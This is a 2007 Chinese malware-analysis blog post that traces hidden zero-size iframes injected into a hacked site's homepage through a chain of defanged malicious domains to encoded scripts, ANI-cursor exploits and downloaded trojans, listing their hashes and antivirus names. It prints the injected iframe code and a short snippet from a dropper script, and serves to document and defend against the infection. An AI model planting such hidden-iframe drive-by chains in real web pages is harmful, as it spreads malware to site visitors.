endurer 原创
2007-06-12 第1版
原来那个Viking还在,又加了一个Viking,几个 Trojan 和 和 Worm。
网站首页被植入代码:
/---
<iframe name="tt" src="exobud.htm" width="580" height="25" scrolling="Auto" frameborder="0"></iframe>
<iframe src=hxxp://www.m*85*8**53.com.cn/index.htm width=0 height=0></iframe>
<iframe src=hxxp://www.m*85*8**53.cn/muma/index.htm width=0 height=0></iframe>
<iframe src=hxxp://w*.m*h*88*8**8.cn/ad.htm?a width=100 height=0 frameborder=0></iframe>
<iframe src=hxxp://www.n*85*85**3.cn/index.htm width=0 height=0></iframe>
<iframe src="hxxp://www.cao*n*i***ma.info/888.html" width="0" height="0" frameborder="0"></iframe>
<iframe src=hxxp://www.m*85*8**53.cn/gogo/index.htm width=0 height=0></iframe>
--/
exobud.htm 包含代码:
/---
<iframe src="hxxp://w*.m*h*88*8**8.cn/ad.htm?a" width="100" height="0"></iframe>
<iframe src=hxxp://w*.m*h*88*8**8.cn/ad.htm?a width=100 height=0 frameborder=0></iframe>
---/
hxxp://w*.m*h*88*8**8.cn/ad.htm?a 包含代码:
/---
<iframe src="hxxp://www.5*46**0*w.cn/3721/myhelp.htm" width="50" height="0"> </iframe>
<iframe src="hxxp://w*.m*h*88*8**8.cn/xxx.htm" width="100" height="0"> </iframe>
<iframe src="hxxp://www.5*46**0*w.cn/sky.htm" width="100" height="0"> </iframe>
<iframe src="hxxp://www.5*46**0*w.cn/index.htm" width="100" height="0"> </iframe>
---/
hxxp://www.m*85*8**53.com.cn/index.htm 包含代码:
/---
<iframe src="hxxp://www.p*u**m*a**163.com/pu/8378692.htm" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://www.m*85*8**53.cn/muma/index.htm 包含代码:
/---
<iframe src=hxxp://www.87**87*72.cn/wm/bms4.htm width=0 height=0></iframe>
---/
hxxp://www.n*85*85**3.cn/index.htm 末包含代码:
/---
<iframe src="hxxp://www.zpx520.com/cs1.htm?id=88394868-6929" width=0 height=0></iframe>
---/
hxxp://www.cao*n*i***ma.info/888.html 包含代码:
/---
<iframe src="hxxp://www.5*5**5*y.net/888.htm" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://www.5*5**5*y.net/888.htm 包含代码:
/---
<iframe src="hxxp://www.d*eb**a*e.cn/" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://www.5*5**5*y.net/" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://www.q*q*8**81.cn/" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://www.52**00***1*8.com/" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://www.d*eb**a*e.cn 包含代码:
/---
<iframe src="hxxp://www.pu*m*a*164.com/pu/551903.htm" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://www.pu*m*a*164.com/pu/551903.htm 包含代码:
/---
<SCRIPT language="Jscript.encode" src=164.js></script>
---/
164.js 内容为eval()执行自定义函数,经3次解密得到原始代码,下载1.exe。
文件说明符 : D:/test/1.exe
属性 : A---
语言 : 中文(中国)
文件版本 : 1.0.0.0
说明 :
版权 :
备注 :
产品版本 : 1.0.0.0
产品名称 :
公司名称 :
合法商标 :
内部名称 :
源文件名 :
创建时间 : 2007-6-21 12:33:55
修改时间 : 2007-6-21 12:33:56
访问时间 : 2007-6-21 0:0:0
大小 : 95232 字节 93.0 KB
MD5 : 24785a0619735bfb63a5b7ffa27c7821
Kaspersky 报为 Worm.Win32.Viking.ls,瑞星报为 Worm.Viking.tl
hxxp://www.5*5**5*y.net/ 包含代码:
/---
<iframe src=hxxp://www.b*y**i*p.cn/newdm/new82.htm width=0 height=0></iframe>
---/
hxxp://www.b*y**i*p.cn/newdm/new82.htm 是JavaScript和VBScript混合代码,输出为VBScript代码,功能是下载 hxxp://x*xt**vb*.cn/arp/dd.exe
文件说明符 : D:/test/dd.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-6-21 12:40:27
修改时间 : 2007-6-21 12:40:28
访问时间 : 2007-6-21 0:0:0
大小 : 36352 字节 35.512 KB
MD5 : 8faba4ed58813539bdf4b2a0c9b1191c
瑞星报为 Trojan.DL.Mnless.ajs
hxxp://www.q*q*8**81.cn/ 包含代码:
/---
<iframe src=hxxp://weather**.n*e**ws.wl**3*21.cn/7/1.htm width=0 height=0></iframe>
---/
hxxp://weather**.n*e**ws.wl**3*21.cn/7/1.htm 包含代码:
/---
<SCRIPT language="Jscript.encode" src=14.js></script>
---/
14.js 内容为eval()执行自定义函数,经2次解密得到原始代码,下载 hxxp://weather**.n*e**ws.wl**3*21.cn/0/x.exe
文件说明符 : D:/pe/tools/virus/x.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-6-21 12:43:36
修改时间 : 2007-6-21 12:43:38
访问时间 : 2007-6-21 0:0:0
大小 : 51783 字节 50.583 KB
MD5 : 2fb4f30dbc4f74f06e9bf977a0187010
hxxp://www.52**00***1*8.com/ 首部包含代码:
/---
<iframe src="hxxp://www.dz*y**520.com/cs.htm?id=slsxmt" width=0 height=0></iframe>
---/
hxxp://www.dz*y**520.com/cs.htm?id=slsxmt 包含两段恶意代码。
1、US-ASCII编码的字符。到 hxxp://purpleendurer.ys168.com 下载 US-ASCII 编码解码器,解码为:
/---
<HTML>
<BODY style='CURSOR: url(hxxp://q*.z*p**x5*20.com/w.js)'>
</BODY>
</HTML>
---/
hxxp://q*.z*p**x5*20.com/w.js 利用 ANI 漏洞下载 0.exe
文件说明符 : D:/test/0.exe
获取文件版本信息大小失败!
创建时间 : 2007-6-20 12:4:42
修改时间 : 2007-6-20 12:4:44
访问时间 : 2007-6-20 0:0:0
大小 : 22735 字节 22.207 KB
MD5 : 0866f380b3acb7f4f057780360677571
Kaspersky 报为 Trojan-PSW.Win32.Delf.qc
2、代码:
/---
<iframe src="hxxp://q*.z*p**x5*20.com/1.htm" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://q*.z*p**x5*20.com/1.htm 包含US-ASCII编码的字符。解码为JavaScript代码,下载 0.exe。
hxxp://www.m*85*8**53.cn/gogo/index.htm 包含代码:
/---
<iframe src="hxxp://5*5*5.5*5***5y.net/888.htm" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://5*5*5.5*5***5y.net/888.htm 包含代码:
/---
<iframe src="hxxp://www.tr**e*q.cn/" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://www.d*eb**a*e.cn/" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://5*5*5.5*5***5y.net/" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://www.q*q*8**81.cn/" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://www.1**25*a*.cn/" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://www.m**qd**l*.com/index.htm" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://www.5*46**0*w.cn/3721/myhelp.htm 包含代码:
/---
<iframe src="vip1.htm" width="0" height="0" border="0"></iframe>
<iframe src="vip2.htm" width="0" height="0" border="0"></iframe>
<iframe src="vip.htm" width="50" height="0" border="0"></iframe>
---/
vip1.htm、vip2.htm 包含 JavaScript代码,下载520.exe。
文件说明符 : D:/pe/tools/virus/520.exe
获取文件版本信息大小失败!
创建时间 : 2007-6-20 12:29:14
修改时间 : 2007-6-20 12:29:16
访问时间 : 2007-6-20 0:0:0
大小 : 22566 字节 22.38 KB
MD5 : 7ee0d5f58c4672da89fb03e3fdf298aa
Kaspersky 报为 Trojan-Spy.Win32.Delf.uh
vip.htm 包含代码:
/---
<DIV style="CURSOR: url(ah.c)"></DIV>
---/
ah.c 利用 ANI漏洞下载 520.exe。
hxxp://w*.m*h*88*8**8.cn/xxx.htm 包含代码:
/---
<iframe src=hxxp://www.c*o*py*i*p.com/ip001_1.htm width=0 height=0></iframe>
---/
hxxp://www.c*o*py*i*p.com/ip001_1.htm 是JavaScript和VBScript混合代码,输出为VBScript代码,下载 do.exe 和 ip001_1.exe。
文件说明符 : D:/test/do.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-6-21 12:49:20
修改时间 : 2007-6-21 12:49:22
访问时间 : 2007-6-21 0:0:0
大小 : 35840 字节 35.0 KB
MD5 : ea58fec5580718ce3f4a7f8ee89928c3
Kaspersky 报为 Trojan-Downloader.Win32.Delf.bjy,瑞星 报为 Worm.Win32.Agent.uu
文件说明符 : D:/test/ip001_1.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-6-21 12:52:4
修改时间 : 2007-6-21 12:52:6
访问时间 : 2007-6-21 0:0:0
大小 : 41984 字节 41.0 KB
MD5 : e8c9aad9713190fa621a4d729cdb56fd
Kaspersky 报为 Trojan-Downloader.Win32.Banload.awy,瑞星 报为 Trojan.Clicker.Delf.yjd
hxxp://www.5*46**0*w.cn/sky.htm 不存在。
hxxp://www.5*46**0*w.cn/index.htm 包含代码:
/---
<iframe src="hxxp://www.pu*m*a*164.com/pu/709671697.htm?id=56" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://www.pu*m*a*164.com/pu/709671697.htm?id=56 包含代码:
/---
<SCRIPT language="Jscript.encode" src=164.js></script>
---/
164.js 内容为eval()执行自定义函数,经3次解密得到原始代码,下载
hxxp://www.pu*m*a*164.com/pu/1.exe。
hxxp://www.m**qd**l*.com/index.htm 包含代码:
/---
<iframe src="hxxp://bo**olo*m.com/ax.htm?7126?37197" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://bo**olo*m.com/ax.htm?7126?37197 包含代码:
/---
SCRIPT language="Jscript.encode" src=un.js></script>
---/
un.js 内容为eval()执行自定义函数,经3次解密得到原始代码,下载 alexa.exe,
文件名生成函数比较少见:
/---
function HJAakes(slKsm1){var LhzSWS2 = window["Math"]["random"]()*slKsm1;return window["Math"]["round"](LhzSWS2)+'.exe';
}
---/
文件说明符 : D:/pe/tools/virus/alexa.exe
属性 : A---
语言 : 中文(中国)
文件版本 : 1.0.0.0
说明 :
版权 :
备注 :
产品版本 : 1.0.0.0
产品名称 :
公司名称 :
合法商标 :
内部名称 :
源文件名 :
创建时间 : 2007-6-21 13:35:45
修改时间 : 2007-6-21 13:35:46
访问时间 : 2007-6-21 0:0:0
大小 : 95232 字节 93.0 KB
MD5 : 0b75d7947a9ac806318170a2cd45188a
Kaspersky 报为 Worm.Win32.Viking.lm,瑞星 报为 Worm.Viking.tc
分享到:
相关推荐
2021加挂牌子请示范文.docx
金融理财平台房车加挂传播执行方案.pptx
行业文档-设计装置-海洋平台加挂井槽装置
为保证加挂大惯量负载情况下高空气球吊篮反捻机构能够正常工作,对VxWorks实时操作系统在反捻机构控制器中的应用进行了工程实践验证。对VxWorks实时操作系统进行剪裁以提高系统的安全性和可靠性,采用二进制信号量...
一种轮用加挂越野履带系统的制作方法.docx
学习操作系统时我们都了解到文件系统是操作系统的重要组成部分之一...本文总结了一下在Linux上不同情况下几种常见加挂文件系统的方法,包括如何加挂FAT/NTFS/smbfs/U盘,以及解决加挂中关于中文显示/用户密码等的问题。
它只做为一条数据同步的桥,让你不用认识和设计对 eBay API 的接口,而轻易灵活的可让eBay上的交易数据完整的同步到你们自己的 ERP SAP POS 等系统上又或只做数据统计,发货处理等工作上。。 免费使用步骤如下: 1...
描述了LINUX加挂U盘等设备的集中方法。对初学者有一定帮助
Windows Media Player Classic: 拥有更强大的Filter控制功能:支持XP界面主题;在加入解码Filter的情况下可以播放DVD;即使不安装VOBSUB也可以播放某些字幕;可以加挂播放外部的音频文件;改变播放速度等等。
Linux服务器加载新硬盘,分区或者加挂现有分区,Linux系统用户添加,数据库用户及密码初始化
◆ Win NT/2000 的文件系统:ntfs ; ◆ OS/2用的文件系统:hpfs; ◆ Linux用的文件系统:ext2、ext3; ◆ CD-ROM光盘用的文件系统:iso9660。 虽然vfat是指FAT 32系统,但事实上它也兼容FAT 16的文件系统类型...
redhat enterprise 4加挂u盘过程及汉字乱码问题解决方案redhat enterprise 4加挂u盘过程及汉字乱码问题解决方案redhat enterprise 4加挂u盘过程及汉字乱码问题解决方案redhat enterprise 4加挂u盘过程及汉字乱码问题...
测绘助力湿地保护__打造生态花园_省略_息中心加挂厦门市湿地保护中心之际_王迎军
早期的Linux内置支持的文件系统不多,自 kernel 2.0.x 起并支持到 ...本文总结了一下在Linux上不同情况下几种常见加挂文件系统的方法,包括如何加挂FAT/NTFS/smbfs/U盘,以及解决加挂中关于中文显示/用户密码等的问题。
自动执行RAID0的设置,将RAID0的加载及文件系统的加挂全加入到Init.sysinit文件中,这样,只要系统一启动,首先就执行RAID,用户就不必再手工安装了。用户应将以下两个命令加入到Init.sysinit文件中/sbin/mdrun -ar ...
ActiveHTML 可以让您的网站服务器支持 ASP 程序,它是一套 CGI-Program,几乎百分百支持 Microsoft ASP3.0-Standard,若您不是使用 IIS 来架站,则需要加挂此程序,它支持几乎所有的网站服务器(包括:Apache、Sambar...
Office 2007中所有最新的功能已经加入到这套经典菜单和工具栏中。
有利于linux初学者了解linux文件系统的挂载及使用
本文对我国铁路行包运输的现状和存在问题进行了分析和研究,提出在较大的客运站上修建或改建行包装却场和行包装却线。现阶段则采用在旅客列车上加挂1-2节整车行包的方案。文中论述了该方案的必要性、优越性和可行性。
DjVu书签处理:包括导出书签、加挂书签(支持多级书签)、将中美百万的a.opf、catalog.xml转换成FreePic2Pdf接口文件。 DjVu页宽设置:将多页DjVu的页面宽度或DPI设置为一个统一值。 转为图像:将多页DjVu的每一页...